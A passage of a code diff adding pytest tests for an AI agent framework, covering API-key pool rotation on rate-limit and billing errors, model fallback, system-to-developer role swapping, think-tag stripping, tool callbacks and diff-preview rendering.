"patterns": ["^(hi|hello|hey)"],
|
||||
}
|
||||
# Force resolve_runtime_provider to fail so it falls back to primary
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.runtime_provider.resolve_runtime_provider",
|
||||
MagicMock(side_effect=RuntimeError("no credentials")),
|
||||
)
|
||||
result = resolve_turn_route("hi", routing_config, primary)
|
||||
assert result["runtime"]["credential_pool"] is fake_pool
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# 2 & 3. CLI and Gateway _resolve_turn_agent_config include credential_pool
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestCliTurnRoutePool:
|
||||
def test_resolve_turn_includes_pool(self, monkeypatch, tmp_path):
|
||||
"""CLI's _resolve_turn_agent_config must pass credential_pool to primary."""
|
||||
from agent.smart_model_routing import resolve_turn_route
|
||||
captured = {}
|
||||
|
||||
def spy_resolve(user_message, routing_config, primary):
|
||||
captured["primary"] = primary
|
||||
return resolve_turn_route(user_message, routing_config, primary)
|
||||
|
||||
monkeypatch.setattr(
|
||||
"agent.smart_model_routing.resolve_turn_route", spy_resolve
|
||||
)
|
||||
|
||||
# Build a minimal HermesCLI-like object with the method
|
||||
shell = SimpleNamespace(
|
||||
model="gpt-5.4",
|
||||
api_key="sk-test",
|
||||
base_url=None,
|
||||
provider="openai-codex",
|
||||
api_mode="codex_responses",
|
||||
acp_command=None,
|
||||
acp_args=[],
|
||||
_credential_pool=MagicMock(name="FakePool"),
|
||||
_smart_model_routing={"enabled": False},
|
||||
)
|
||||
|
||||
# Import and bind the real method
|
||||
from cli import HermesCLI
|
||||
bound = HermesCLI._resolve_turn_agent_config.__get__(shell)
|
||||
bound("test message")
|
||||
|
||||
assert "credential_pool" in captured["primary"]
|
||||
assert captured["primary"]["credential_pool"] is shell._credential_pool
|
||||
|
||||
|
||||
class TestGatewayTurnRoutePool:
|
||||
def test_resolve_turn_includes_pool(self, monkeypatch):
|
||||
"""Gateway's _resolve_turn_agent_config must pass credential_pool."""
|
||||
from agent.smart_model_routing import resolve_turn_route
|
||||
captured = {}
|
||||
|
||||
def spy_resolve(user_message, routing_config, primary):
|
||||
captured["primary"] = primary
|
||||
return resolve_turn_route(user_message, routing_config, primary)
|
||||
|
||||
monkeypatch.setattr(
|
||||
"agent.smart_model_routing.resolve_turn_route", spy_resolve
|
||||
)
|
||||
|
||||
from gateway.run import GatewayRunner
|
||||
|
||||
runner = SimpleNamespace(
|
||||
_smart_model_routing={"enabled": False},
|
||||
)
|
||||
|
||||
runtime_kwargs = {
|
||||
"api_key": "sk-test",
|
||||
"base_url": None,
|
||||
"provider": "openai-codex",
|
||||
"api_mode": "codex_responses",
|
||||
"command": None,
|
||||
"args": [],
|
||||
"credential_pool": MagicMock(name="FakePool"),
|
||||
}
|
||||
|
||||
bound = GatewayRunner._resolve_turn_agent_config.__get__(runner)
|
||||
bound("test message", "gpt-5.4", runtime_kwargs)
|
||||
|
||||
assert "credential_pool" in captured["primary"]
|
||||
assert captured["primary"]["credential_pool"] is runtime_kwargs["credential_pool"]
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# 4 & 5. Eager fallback deferred/fires based on credential pool
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestEagerFallbackWithPool:
|
||||
"""Test the eager fallback guard in run_agent.py's error handling loop."""
|
||||
|
||||
def _make_agent(self, has_pool=True, pool_has_creds=True, has_fallback=True):
|
||||
"""Create a minimal AIAgent mock with the fields needed."""
|
||||
from run_agent import AIAgent
|
||||
|
||||
with patch.object(AIAgent, "__init__", lambda self, **kw: None):
|
||||
agent = AIAgent()
|
||||
|
||||
agent._credential_pool = None
|
||||
if has_pool:
|
||||
pool = MagicMock()
|
||||
pool.has_available.return_value = pool_has_creds
|
||||
agent._credential_pool = pool
|
||||
|
||||
agent._fallback_chain = [{"model": "fallback/model"}] if has_fallback else []
|
||||
agent._fallback_index = 0
|
||||
agent._try_activate_fallback = MagicMock(return_value=True)
|
||||
agent._emit_status = MagicMock()
|
||||
|
||||
return agent
|
||||
|
||||
def test_eager_fallback_deferred_when_pool_has_credentials(self):
|
||||
"""429 with active pool should NOT trigger eager fallback."""
|
||||
agent = self._make_agent(has_pool=True, pool_has_creds=True, has_fallback=True)
|
||||
|
||||
# Simulate the check from run_agent.py lines 7180-7191
|
||||
is_rate_limited = True
|
||||
if is_rate_limited and agent._fallback_index < len(agent._fallback_chain):
|
||||
pool = agent._credential_pool
|
||||
pool_may_recover = pool is not None and pool.has_available()
|
||||
if not pool_may_recover:
|
||||
agent._try_activate_fallback()
|
||||
|
||||
agent._try_activate_fallback.assert_not_called()
|
||||
|
||||
def test_eager_fallback_fires_when_no_pool(self):
|
||||
"""429 without pool should trigger eager fallback."""
|
||||
agent = self._make_agent(has_pool=False, has_fallback=True)
|
||||
|
||||
is_rate_limited = True
|
||||
if is_rate_limited and agent._fallback_index < len(agent._fallback_chain):
|
||||
pool = agent._credential_pool
|
||||
pool_may_recover = pool is not None and pool.has_available()
|
||||
if not pool_may_recover:
|
||||
agent._try_activate_fallback()
|
||||
|
||||
agent._try_activate_fallback.assert_called_once()
|
||||
|
||||
def test_eager_fallback_fires_when_pool_exhausted(self):
|
||||
"""429 with exhausted pool should trigger eager fallback."""
|
||||
agent = self._make_agent(has_pool=True, pool_has_creds=False, has_fallback=True)
|
||||
|
||||
is_rate_limited = True
|
||||
if is_rate_limited and agent._fallback_index < len(agent._fallback_chain):
|
||||
pool = agent._credential_pool
|
||||
pool_may_recover = pool is not None and pool.has_available()
|
||||
if not pool_may_recover:
|
||||
agent._try_activate_fallback()
|
||||
|
||||
agent._try_activate_fallback.assert_called_once()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# 6. Full 429 rotation cycle via _recover_with_credential_pool
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestPoolRotationCycle:
|
||||
"""Verify the retry-same → rotate → exhaust flow in _recover_with_credential_pool."""
|
||||
|
||||
def _make_agent_with_pool(self, pool_entries=3):
|
||||
from run_agent import AIAgent
|
||||
|
||||
with patch.object(AIAgent, "__init__", lambda self, **kw: None):
|
||||
agent = AIAgent()
|
||||
|
||||
entries = []
|
||||
for i in range(pool_entries):
|
||||
e = MagicMock(name=f"entry_{i}")
|
||||
e.id = f"cred-{i}"
|
||||
entries.append(e)
|
||||
|
||||
pool = MagicMock()
|
||||
pool.has_credentials.return_value = True
|
||||
|
||||
# mark_exhausted_and_rotate returns next entry until exhausted
|
||||
self._rotation_index = 0
|
||||
|
||||
def rotate(status_code=None):
|
||||
self._rotation_index += 1
|
||||
if self._rotation_index < pool_entries:
|
||||
return entries[self._rotation_index]
|
||||
pool.has_credentials.return_value = False
|
||||
return None
|
||||
|
||||
pool.mark_exhausted_and_rotate = MagicMock(side_effect=rotate)
|
||||
agent._credential_pool = pool
|
||||
agent._swap_credential = MagicMock()
|
||||
agent.log_prefix = ""
|
||||
|
||||
return agent, pool, entries
|
||||
|
||||
def test_first_429_sets_retry_flag_no_rotation(self):
|
||||
"""First 429 should just set has_retried_429=True, no rotation."""
|
||||
agent, pool, _ = self._make_agent_with_pool(3)
|
||||
recovered, has_retried = agent._recover_with_credential_pool(
|
||||
status_code=429, has_retried_429=False
|
||||
)
|
||||
assert recovered is False
|
||||
assert has_retried is True
|
||||
pool.mark_exhausted_and_rotate.assert_not_called()
|
||||
|
||||
def test_second_429_rotates_to_next(self):
|
||||
"""Second consecutive 429 should rotate to next credential."""
|
||||
agent, pool, entries = self._make_agent_with_pool(3)
|
||||
recovered, has_retried = agent._recover_with_credential_pool(
|
||||
status_code=429, has_retried_429=True
|
||||
)
|
||||
assert recovered is True
|
||||
assert has_retried is False # reset after rotation
|
||||
pool.mark_exhausted_and_rotate.assert_called_once_with(status_code=429)
|
||||
agent._swap_credential.assert_called_once_with(entries[1])
|
||||
|
||||
def test_pool_exhaustion_returns_false(self):
|
||||
"""When all credentials exhausted, recovery should return False."""
|
||||
agent, pool, _ = self._make_agent_with_pool(1)
|
||||
# First 429 sets flag
|
||||
_, has_retried = agent._recover_with_credential_pool(
|
||||
status_code=429, has_retried_429=False
|
||||
)
|
||||
assert has_retried is True
|
||||
|
||||
# Second 429 tries to rotate but pool is exhausted (only 1 entry)
|
||||
recovered, _ = agent._recover_with_credential_pool(
|
||||
status_code=429, has_retried_429=True
|
||||
)
|
||||
assert recovered is False
|
||||
|
||||
def test_402_immediate_rotation(self):
|
||||
"""402 (billing) should immediately rotate, no retry-first."""
|
||||
agent, pool, entries = self._make_agent_with_pool(3)
|
||||
recovered, has_retried = agent._recover_with_credential_pool(
|
||||
status_code=402, has_retried_429=False
|
||||
)
|
||||
assert recovered is True
|
||||
assert has_retried is False
|
||||
pool.mark_exhausted_and_rotate.assert_called_once_with(status_code=402)
|
||||
|
||||
def test_no_pool_returns_false(self):
|
||||
"""No pool should return (False, unchanged)."""
|
||||
from run_agent import AIAgent
|
||||
|
||||
with patch.object(AIAgent, "__init__", lambda self, **kw: None):
|
||||
agent = AIAgent()
|
||||
agent._credential_pool = None
|
||||
|
||||
recovered, has_retried = agent._recover_with_credential_pool(
|
||||
status_code=429, has_retried_429=False
|
||||
)
|
||||
assert recovered is False
|
||||
assert has_retried is False
|
||||
|
|
@ -1,7 +1,17 @@
|
|||
"""Tests for agent/display.py — build_tool_preview()."""
|
||||
"""Tests for agent/display.py — build_tool_preview() and inline diff previews."""
|
||||
|
||||
import os
|
||||
import pytest
|
||||
from agent.display import build_tool_preview
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
from agent.display import (
|
||||
build_tool_preview,
|
||||
capture_local_edit_snapshot,
|
||||
extract_edit_diff,
|
||||
_render_inline_unified_diff,
|
||||
_summarize_rendered_diff_sections,
|
||||
render_edit_diff_with_delta,
|
||||
)
|
||||
|
||||
|
||||
class TestBuildToolPreview:
|
||||
|
|
@ -83,3 +93,110 @@ class TestBuildToolPreview:
|
|||
assert build_tool_preview("terminal", 0) is None
|
||||
assert build_tool_preview("terminal", "") is None
|
||||
assert build_tool_preview("terminal", []) is None
|
||||
|
||||
|
||||
class TestEditDiffPreview:
|
||||
def test_extract_edit_diff_for_patch(self):
|
||||
diff = extract_edit_diff("patch", '{"success": true, "diff": "--- a/x\\n+++ b/x\\n"}')
|
||||
assert diff is not None
|
||||
assert "+++ b/x" in diff
|
||||
|
||||
def test_render_inline_unified_diff_colors_added_and_removed_lines(self):
|
||||
rendered = _render_inline_unified_diff(
|
||||
"--- a/cli.py\n"
|
||||
"+++ b/cli.py\n"
|
||||
"@@ -1,2 +1,2 @@\n"
|
||||
"-old line\n"
|
||||
"+new line\n"
|
||||
" context\n"
|
||||
)
|
||||
|
||||
assert "a/cli.py" in rendered[0]
|
||||
assert "b/cli.py" in rendered[0]
|
||||
assert any("old line" in line for line in rendered)
|
||||
assert any("new line" in line for line in rendered)
|
||||
assert any("48;2;" in line for line in rendered)
|
||||
|
||||
def test_extract_edit_diff_ignores_non_edit_tools(self):
|
||||
assert extract_edit_diff("web_search", '{"diff": "--- a\\n+++ b\\n"}') is None
|
||||
|
||||
def test_extract_edit_diff_uses_local_snapshot_for_write_file(self, tmp_path):
|
||||
target = tmp_path / "note.txt"
|
||||
target.write_text("old\n", encoding="utf-8")
|
||||
|
||||
snapshot = capture_local_edit_snapshot("write_file", {"path": str(target)})
|
||||
|
||||
target.write_text("new\n", encoding="utf-8")
|
||||
|
||||
diff = extract_edit_diff(
|
||||
"write_file",
|
||||
'{"bytes_written": 4}',
|
||||
function_args={"path": str(target)},
|
||||
snapshot=snapshot,
|
||||
)
|
||||
|
||||
assert diff is not None
|
||||
assert "--- a/" in diff
|
||||
assert "+++ b/" in diff
|
||||
assert "-old" in diff
|
||||
assert "+new" in diff
|
||||
|
||||
def test_render_edit_diff_with_delta_invokes_printer(self):
|
||||
printer = MagicMock()
|
||||
|
||||
rendered = render_edit_diff_with_delta(
|
||||
"patch",
|
||||
'{"diff": "--- a/x\\n+++ b/x\\n@@ -1 +1 @@\\n-old\\n+new\\n"}',
|
||||
print_fn=printer,
|
||||
)
|
||||
|
||||
assert rendered is True
|
||||
assert printer.call_count >= 2
|
||||
calls = [call.args[0] for call in printer.call_args_list]
|
||||
assert any("a/x" in line and "b/x" in line for line in calls)
|
||||
assert any("old" in line for line in calls)
|
||||
assert any("new" in line for line in calls)
|
||||
|
||||
def test_render_edit_diff_with_delta_skips_without_diff(self):
|
||||
rendered = render_edit_diff_with_delta(
|
||||
"patch",
|
||||
'{"success": true}',
|
||||
)
|
||||
|
||||
assert rendered is False
|
||||
|
||||
def test_render_edit_diff_with_delta_handles_renderer_errors(self, monkeypatch):
|
||||
printer = MagicMock()
|
||||
|
||||
monkeypatch.setattr("agent.display._summarize_rendered_diff_sections", MagicMock(side_effect=RuntimeError("boom")))
|
||||
|
||||
rendered = render_edit_diff_with_delta(
|
||||
"patch",
|
||||
'{"diff": "--- a/x\\n+++ b/x\\n"}',
|
||||
print_fn=printer,
|
||||
)
|
||||
|
||||
assert rendered is False
|
||||
assert printer.call_count == 0
|
||||
|
||||
def test_summarize_rendered_diff_sections_truncates_large_diff(self):
|
||||
diff = "--- a/x.py\n+++ b/x.py\n" + "".join(f"+line{i}\n" for i in range(120))
|
||||
|
||||
rendered = _summarize_rendered_diff_sections(diff, max_lines=20)
|
||||
|
||||
assert len(rendered) == 21
|
||||
assert "omitted" in rendered[-1]
|
||||
|
||||
def test_summarize_rendered_diff_sections_limits_file_count(self):
|
||||
diff = "".join(
|
||||
f"--- a/file{i}.py\n+++ b/file{i}.py\n+line{i}\n"
|
||||
for i in range(8)
|
||||
)
|
||||
|
||||
rendered = _summarize_rendered_diff_sections(diff, max_files=3, max_lines=50)
|
||||
|
||||
assert any("a/file0.py" in line for line in rendered)
|
||||
assert any("a/file1.py" in line for line in rendered)
|
||||
assert any("a/file2.py" in line for line in rendered)
|
||||
assert not any("a/file7.py" in line for line in rendered)
|
||||
assert "additional file" in rendered[-1]
|
||||
|
|
|
|||
22
tests/test_packaging_metadata.py
Normal file
22
tests/test_packaging_metadata.py
Normal file
|
|
@ -0,0 +1,22 @@
|
|||
from pathlib import Path
|
||||
import tomllib
|
||||
|
||||
|
||||
REPO_ROOT = Path(__file__).resolve().parents[1]
|
||||
|
||||
|
||||
def test_faster_whisper_is_not_a_base_dependency():
|
||||
data = tomllib.loads((REPO_ROOT / "pyproject.toml").read_text(encoding="utf-8"))
|
||||
deps = data["project"]["dependencies"]
|
||||
|
||||
assert not any(dep.startswith("faster-whisper") for dep in deps)
|
||||
|
||||
voice_extra = data["project"]["optional-dependencies"]["voice"]
|
||||
assert any(dep.startswith("faster-whisper") for dep in voice_extra)
|
||||
|
||||
|
||||
def test_manifest_includes_bundled_skills():
|
||||
manifest = (REPO_ROOT / "MANIFEST.in").read_text(encoding="utf-8")
|
||||
|
||||
assert "graft skills" in manifest
|
||||
assert "graft optional-skills" in manifest
|
||||
|
|
@ -137,6 +137,76 @@ class TestBuildApiKwargsOpenRouter:
|
|||
assert "codex_reasoning_items" in messages[1]
|
||||
|
||||
|
||||
class TestDeveloperRoleSwap:
|
||||
"""GPT-5 and Codex models should get 'developer' instead of 'system' role."""
|
||||
|
||||
@pytest.mark.parametrize("model", [
|
||||
"openai/gpt-5",
|
||||
"openai/gpt-5-turbo",
|
||||
"openai/gpt-5.4",
|
||||
"gpt-5-mini",
|
||||
"openai/codex-mini",
|
||||
"codex-mini-latest",
|
||||
"openai/codex-pro",
|
||||
])
|
||||
def test_gpt5_codex_get_developer_role(self, monkeypatch, model):
|
||||
agent = _make_agent(monkeypatch, "openrouter")
|
||||
agent.model = model
|
||||
messages = [
|
||||
{"role": "system", "content": "You are helpful."},
|
||||
{"role": "user", "content": "hi"},
|
||||
]
|
||||
kwargs = agent._build_api_kwargs(messages)
|
||||
assert kwargs["messages"][0]["role"] == "developer"
|
||||
assert kwargs["messages"][0]["content"] == "You are helpful."
|
||||
assert kwargs["messages"][1]["role"] == "user"
|
||||
|
||||
@pytest.mark.parametrize("model", [
|
||||
"anthropic/claude-opus-4.6",
|
||||
"openai/gpt-4o",
|
||||
"google/gemini-2.5-pro",
|
||||
"deepseek/deepseek-chat",
|
||||
"openai/o3-mini",
|
||||
])
|
||||
def test_non_matching_models_keep_system_role(self, monkeypatch, model):
|
||||
agent = _make_agent(monkeypatch, "openrouter")
|
||||
agent.model = model
|
||||
messages = [
|
||||
{"role": "system", "content": "You are helpful."},
|
||||
{"role": "user", "content": "hi"},
|
||||
]
|
||||
kwargs = agent._build_api_kwargs(messages)
|
||||
assert kwargs["messages"][0]["role"] == "system"
|
||||
|
||||
def test_no_system_message_no_crash(self, monkeypatch):
|
||||
agent = _make_agent(monkeypatch, "openrouter")
|
||||
agent.model = "openai/gpt-5"
|
||||
messages = [{"role": "user", "content": "hi"}]
|
||||
kwargs = agent._build_api_kwargs(messages)
|
||||
assert kwargs["messages"][0]["role"] == "user"
|
||||
|
||||
def test_original_messages_not_mutated(self, monkeypatch):
|
||||
agent = _make_agent(monkeypatch, "openrouter")
|
||||
agent.model = "openai/gpt-5"
|
||||
messages = [
|
||||
{"role": "system", "content": "You are helpful."},
|
||||
{"role": "user", "content": "hi"},
|
||||
]
|
||||
agent._build_api_kwargs(messages)
|
||||
# Original messages must be untouched (internal representation stays "system")
|
||||
assert messages[0]["role"] == "system"
|
||||
|
||||
def test_developer_role_via_nous_portal(self, monkeypatch):
|
||||
agent = _make_agent(monkeypatch, "nous", base_url="https://inference-api.nousresearch.com/v1")
|
||||
agent.model = "gpt-5"
|
||||
messages = [
|
||||
{"role": "system", "content": "You are helpful."},
|
||||
{"role": "user", "content": "hi"},
|
||||
]
|
||||
kwargs = agent._build_api_kwargs(messages)
|
||||
assert kwargs["messages"][0]["role"] == "developer"
|
||||
|
||||
|
||||
class TestBuildApiKwargsAIGateway:
|
||||
def test_uses_chat_completions_format(self, monkeypatch):
|
||||
agent = _make_agent(monkeypatch, "ai-gateway", base_url="https://ai-gateway.vercel.sh/v1")
|
||||
|
|
@ -559,11 +629,18 @@ class TestAuxiliaryClientProviderPriority:
|
|||
assert model == "google/gemini-3-flash-preview"
|
||||
|
||||
def test_custom_endpoint_when_no_nous(self, monkeypatch):
|
||||
"""Custom endpoint is used when no OpenRouter/Nous keys are available.
|
||||
|
||||
Since the March 2026 config refactor, OPENAI_BASE_URL env var is no
|
||||
longer consulted — base_url comes from config.yaml via
|
||||
resolve_runtime_provider. Mock _resolve_custom_runtime directly.
|
||||
"""
|
||||
monkeypatch.delenv("OPENROUTER_API_KEY", raising=False)
|
||||
monkeypatch.setenv("OPENAI_BASE_URL", "http://localhost:1234/v1")
|
||||
monkeypatch.setenv("OPENAI_API_KEY", "local-key")
|
||||
from agent.auxiliary_client import get_text_auxiliary_client
|
||||
with patch("agent.auxiliary_client._read_nous_auth", return_value=None), \
|
||||
patch("agent.auxiliary_client._resolve_custom_runtime",
|
||||
return_value=("http://localhost:1234/v1", "local-key")), \
|
||||
patch("agent.auxiliary_client.OpenAI") as mock:
|
||||
client, model = get_text_auxiliary_client()
|
||||
assert mock.call_args.kwargs["base_url"] == "http://localhost:1234/v1"
|
||||
|
|
|
|||
|
|
@ -230,6 +230,27 @@ class TestStripThinkBlocks:
|
|||
assert "line1" not in result
|
||||
assert "visible" in result
|
||||
|
||||
def test_orphaned_closing_think_tag(self, agent):
|
||||
result = agent._strip_think_blocks("some reasoning</think>actual answer")
|
||||
assert "</think>" not in result
|
||||
assert "actual answer" in result
|
||||
|
||||
def test_orphaned_closing_thinking_tag(self, agent):
|
||||
result = agent._strip_think_blocks("reasoning</thinking>answer")
|
||||
assert "</thinking>" not in result
|
||||
assert "answer" in result
|
||||
|
||||
def test_orphaned_opening_think_tag(self, agent):
|
||||
result = agent._strip_think_blocks("<think>orphaned reasoning without close")
|
||||
assert "<think>" not in result
|
||||
|
||||
def test_mixed_orphaned_and_paired_tags(self, agent):
|
||||
text = "stray</think><think>paired reasoning</think> visible"
|
||||
result = agent._strip_think_blocks(text)
|
||||
assert "</think>" not in result
|
||||
assert "<think>" not in result
|
||||
assert "visible" in result
|
||||
|
||||
|
||||
class TestExtractReasoning:
|
||||
def test_reasoning_field(self, agent):
|
||||
|
|
@ -1223,6 +1244,42 @@ class TestConcurrentToolExecution:
|
|||
)
|
||||
assert result == "result"
|
||||
|
||||
def test_sequential_tool_callbacks_fire_in_order(self, agent):
|
||||
tool_call = _mock_tool_call(name="web_search", arguments='{"query":"hello"}', call_id="c1")
|
||||
mock_msg = _mock_assistant_msg(content="", tool_calls=[tool_call])
|
||||
messages = []
|
||||
starts = []
|
||||
completes = []
|
||||
agent.tool_start_callback = lambda tool_call_id, function_name, function_args: starts.append((tool_call_id, function_name, function_args))
|
||||
agent.tool_complete_callback = lambda tool_call_id, function_name, function_args, function_result: completes.append((tool_call_id, function_name, function_args, function_result))
|
||||
|
||||
with patch("run_agent.handle_function_call", return_value='{"success": true}'):
|
||||
agent._execute_tool_calls_sequential(mock_msg, messages, "task-1")
|
||||
|
||||
assert starts == [("c1", "web_search", {"query": "hello"})]
|
||||
assert completes == [("c1", "web_search", {"query": "hello"}, '{"success": true}')]
|
||||
|
||||
def test_concurrent_tool_callbacks_fire_for_each_tool(self, agent):
|
||||
tc1 = _mock_tool_call(name="web_search", arguments='{"query":"one"}', call_id="c1")
|
||||
tc2 = _mock_tool_call(name="web_search", arguments='{"query":"two"}', call_id="c2")
|
||||
mock_msg = _mock_assistant_msg(content="", tool_calls=[tc1, tc2])
|
||||
messages = []
|
||||
starts = []
|
||||
completes = []
|
||||
agent.tool_start_callback = lambda tool_call_id, function_name, function_args: starts.append((tool_call_id, function_name, function_args))
|
||||
agent.tool_complete_callback = lambda tool_call_id, function_name, function_args, function_result: completes.append((tool_call_id, function_name, function_args, function_result))
|
||||
|
||||
with patch("run_agent.handle_function_call", side_effect=['{"id":1}', '{"id":2}']):
|
||||
agent._execute_tool_calls_concurrent(mock_msg, messages, "task-1")
|
||||
|
||||
assert starts == [
|
||||
("c1", "web_search", {"query": "one"}),
|
||||
("c2", "web_search", {"query": "two"}),
|
||||
]
|
||||
assert len(completes) == 2
|
||||
assert {entry[0] for entry in completes} == {"c1", "c2"}
|
||||
assert {entry[3] for entry in completes} == {'{"id":1}', '{"id":2}'}
|
||||
|
||||
def test_invoke_tool_handles_agent_level_tools(self, agent):
|
||||
"""_invoke_tool should handle todo tool directly."""
|
||||
with patch("tools.todo_tool.todo_tool", return_value='{"ok":true}') as mock_todo:
|
||||
|
|
@ -1264,6 +1321,38 @@ class TestPathsOverlap:
|
|||
assert not _paths_overlap(Path("src/a.py"), Path(""))
|
||||
|
||||
|
||||
class TestParallelScopePathNormalization:
|
||||
def test_extract_parallel_scope_path_normalizes_relative_to_cwd(self, tmp_path, monkeypatch):
|
||||
from run_agent import _extract_parallel_scope_path
|
||||
|
||||
monkeypatch.chdir(tmp_path)
|
||||
|
||||
scoped = _extract_parallel_scope_path("write_file", {"path": "./notes.txt"})
|
||||
|
||||
assert scoped == tmp_path / "notes.txt"
|
||||
|
||||
def test_extract_parallel_scope_path_treats_relative_and_absolute_same_file_as_same_scope(self, tmp_path, monkeypatch):
|
||||
from run_agent import _extract_parallel_scope_path, _paths_overlap
|
||||
|
||||
monkeypatch.chdir(tmp_path)
|
||||
abs_path = tmp_path / "notes.txt"
|
||||
|
||||
rel_scoped = _extract_parallel_scope_path("write_file", {"path": "notes.txt"})
|
||||
abs_scoped = _extract_parallel_scope_path("write_file", {"path": str(abs_path)})
|
||||
|
||||
assert rel_scoped == abs_scoped
|
||||
assert _paths_overlap(rel_scoped, abs_scoped)
|
||||
|
||||
def test_should_parallelize_tool_batch_rejects_same_file_with_mixed_path_spellings(self, tmp_path, monkeypatch):
|
||||
from run_agent import _should_parallelize_tool_batch
|
||||
|
||||
monkeypatch.chdir(tmp_path)
|
||||
tc1 = _mock_tool_call(name="write_file", arguments='{"path":"notes.txt","content":"one"}', call_id="c1")
|
||||
tc2 = _mock_tool_call(name="write_file", arguments=f'{{"path":"{tmp_path / "notes.txt"}","content":"two"}}', call_id="c2")
|
||||
|
||||
assert not _should_parallelize_tool_batch([tc1, tc2])
|
||||
|
||||
|
||||
class TestHandleMaxIterations:
|
||||
def test_returns_summary(self, agent):
|
||||
resp = _mock_response(content="Here is a summary of what I did.")
|
||||
|
|
@ -1776,6 +1865,127 @@ class TestNousCredentialRefresh:
|
|||
assert isinstance(agent.client, _RebuiltClient)
|
||||
|
||||
|
||||
class TestCredentialPoolRecovery:
|
||||
def test_recover_with_pool_rotates_on_402(self, agent):
|
||||
current = SimpleNamespace(label="primary")
|
||||
next_entry = SimpleNamespace(label="secondary")
|
||||
|
||||
class _Pool:
|
||||
def current(self):
|
||||
return current
|
||||
|
||||
def mark_exhausted_and_rotate(self, *, status_code):
|
||||
assert status_code == 402
|
||||
return next_entry
|
||||
|
||||
agent._credential_pool = _Pool()
|
||||
agent._swap_credential = MagicMock()
|
||||
|
||||
recovered, retry_same = agent._recover_with_credential_pool(
|
||||
status_code=402,
|
||||
has_retried_429=False,
|
||||
)
|
||||
|
||||
assert recovered is True
|
||||
assert retry_same is False
|
||||
agent._swap_credential.assert_called_once_with(next_entry)
|
||||
|
||||
def test_recover_with_pool_retries_first_429_then_rotates(self, agent):
|
||||
next_entry = SimpleNamespace(label="secondary")
|
||||
|
||||
class _Pool:
|
||||
def current(self):
|
||||
return SimpleNamespace(label="primary")
|
||||
|
||||
def mark_exhausted_and_rotate(self, *, status_code):
|
||||
assert status_code == 429
|
||||
return next_entry
|
||||
|
||||
agent._credential_pool = _Pool()
|
||||
agent._swap_credential = MagicMock()
|
||||
|
||||
recovered, retry_same = agent._recover_with_credential_pool(
|
||||
status_code=429,
|
||||
has_retried_429=False,
|
||||
)
|
||||
assert recovered is False
|
||||
assert retry_same is True
|
||||
agent._swap_credential.assert_not_called()
|
||||
|
||||
recovered, retry_same = agent._recover_with_credential_pool(
|
||||
status_code=429,
|
||||
has_retried_429=True,
|
||||
)
|
||||
assert recovered is True
|
||||
assert retry_same is False
|
||||
agent._swap_credential.assert_called_once_with(next_entry)
|
||||
|
||||
|
||||
def test_recover_with_pool_refreshes_on_401(self, agent):
|
||||
"""401 with successful refresh should swap to refreshed credential."""
|
||||
refreshed_entry = SimpleNamespace(label="refreshed-primary", id="abc")
|
||||
|
||||
class _Pool:
|
||||
def try_refresh_current(self):
|
||||
return refreshed_entry
|
||||
|
||||
agent._credential_pool = _Pool()
|
||||
agent._swap_credential = MagicMock()
|
||||
|
||||
recovered, retry_same = agent._recover_with_credential_pool(
|
||||
status_code=401,
|
||||
has_retried_429=False,
|
||||
)
|
||||
|
||||
assert recovered is True
|
||||
agent._swap_credential.assert_called_once_with(refreshed_entry)
|
||||
|
||||
def test_recover_with_pool_rotates_on_401_when_refresh_fails(self, agent):
|
||||
"""401 with failed refresh should rotate to next credential."""
|
||||
next_entry = SimpleNamespace(label="secondary", id="def")
|
||||
|
||||
class _Pool:
|
||||
def try_refresh_current(self):
|
||||
return None # refresh failed
|
||||
|
||||
def mark_exhausted_and_rotate(self, *, status_code):
|
||||
assert status_code == 401
|
||||
return next_entry
|
||||
|
||||
agent._credential_pool = _Pool()
|
||||
agent._swap_credential = MagicMock()
|
||||
|
||||
recovered, retry_same = agent._recover_with_credential_pool(
|
||||
status_code=401,
|
||||
has_retried_429=False,
|
||||
)
|
||||
|
||||
assert recovered is True
|
||||
assert retry_same is False
|
||||
agent._swap_credential.assert_called_once_with(next_entry)
|
||||
|
||||
def test_recover_with_pool_401_refresh_fails_no_more_credentials(self, agent):
|
||||
"""401 with failed refresh and no other credentials returns not recovered."""
|
||||
|
||||
class _Pool:
|
||||
def try_refresh_current(self):
|
||||
return None
|
||||
|
||||
def mark_exhausted_and_rotate(self, *, status_code):
|
||||
return None # no more credentials
|
||||
|
||||
agent._credential_pool = _Pool()
|
||||
agent._swap_credential = MagicMock()
|
||||
|
||||
recovered, retry_same = agent._recover_with_credential_pool(
|
||||
status_code=401,
|
||||
has_retried_429=False,
|
||||
)
|
||||
|
||||
assert recovered is False
|
||||
agent._swap_credential.assert_not_called()
|
||||
|
||||
|
||||
class TestMaxTokensParam:
|
||||
"""Verify _max_tokens_param returns the correct key for each provider."""
|
||||
|
||||
|
|
@ -2604,6 +2814,46 @@ def test_is_openai_client_closed_honors_custom_client_flag():
|
|||
assert AIAgent._is_openai_client_closed(SimpleNamespace(is_closed=False)) is False
|
||||
|
||||
|
||||
def test_is_openai_client_closed_handles_method_form():
|
||||
"""Fix for issue #4377: is_closed as method (openai SDK) vs property (httpx).
|
||||
|
||||
The openai SDK's is_closed is a method, not a property. Prior to this fix,
|
||||
getattr(client, "is_closed", False) returned the bound method object, which
|
||||
is always truthy, causing the function to incorrectly report all clients as
|
||||
closed and triggering unnecessary client recreation on every API call.
|
||||
"""
|
||||
|
||||
class MethodFormClient:
|
||||
"""Mimics openai.OpenAI where is_closed() is a method."""
|
||||
|
||||
def __init__(self, closed: bool):
|
||||
self._closed = closed
|
||||
|
||||
def is_closed(self) -> bool:
|
||||
return self._closed
|
||||
|
||||
# Method returning False - client is open
|
||||
open_client = MethodFormClient(closed=False)
|
||||
assert AIAgent._is_openai_client_closed(open_client) is False
|
||||
|
||||
# Method returning True - client is closed
|
||||
closed_client = MethodFormClient(closed=True)
|
||||
assert AIAgent._is_openai_client_closed(closed_client) is True
|
||||
|
||||
|
||||
def test_is_openai_client_closed_falls_back_to_http_client():
|
||||
"""Verify fallback to _client.is_closed when top-level is_closed is None."""
|
||||
|
||||
class ClientWithHttpClient:
|
||||
is_closed = None # No top-level is_closed
|
||||
|
||||
